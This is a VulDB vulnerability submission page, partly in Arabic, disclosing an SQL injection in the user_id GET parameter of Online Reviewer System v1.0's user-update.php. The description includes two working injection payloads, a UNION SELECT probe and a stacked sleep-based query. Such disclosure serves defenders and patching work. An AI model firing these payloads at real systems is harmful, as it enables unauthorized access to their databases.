إرسال #153911: Online Reviewer System v1.0 /reviewer/system/system/admins/manage/users/user-update.php GET parameter user_id exists SQL injection vulnerabilityالمعلومات

عنوانOnline Reviewer System v1.0 /reviewer/system/system/admins/manage/users/user-update.php GET parameter user_id exists SQL injection vulnerability
الوصفAn issue was discovered in Online Reviewer System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /reviewer/system/system/admins/manage/users/user-update.php?user_id. Payload1:user_id=2' union all select null,null,null,null,concat(0x353637,0x454647),null,null,null,null,null-- - Payload2:user_id=2';select sleep(5)-- -
المصدر⚠️ https://github.com/rick13795/bug_report/blob/main/SQLi-1.md
المستخدم
 waibi8Bu (UID 46293)
ارسال09/05/2023 06:25 AM (3 سنوات منذ)
الاعتدال09/05/2023 02:16 PM (8 hours later)
الحالةتمت الموافقة
إدخال VulDB228398 [SourceCodester Online Reviewer System 1.0 GET Parameter user-update.php user_id حقن SQL]
النقاط20

Do you want to use VulDB in your project?

Use the official API to access entries easily!